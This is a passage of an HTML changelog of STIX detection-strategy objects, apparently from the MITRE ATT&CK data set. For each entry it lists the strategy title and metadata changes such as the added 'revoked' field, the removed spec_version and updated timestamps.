1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0147] Detection Strategy for Cloud Service Hijacking via SaaS Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0578] Detection Strategy for Cloud Storage Object Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0505] Detection Strategy for Command Obfuscation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0501] Detection Strategy for Compile After Delivery - Source Code to Executable Transformation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0281] Detection Strategy for Compressed Payload Creation and Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.697000+00:00</td></tr></tbody></table></details><hr><h4>[DET0065] Detection Strategy for Container Administration Command Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0490] Detection Strategy for Container and Resource Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0349] Detection Strategy for Content Injection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0108] Detection Strategy for Data Encoding in C2 Channels</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0059] Detection Strategy for Data Manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0213] Detection Strategy for Data Transfer Size Limits and Chunked Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0592] Detection Strategy for Data from Configuration Repository on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0410] Detection Strategy for Data from Network Shared Drive</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0371] Detection Strategy for Debugger Evasion (T1622)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0563] Detection Strategy for Defense Impairment via Prevent Command History Logging across OS platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:25:01.924Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0579] Detection Strategy for Device Driver Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 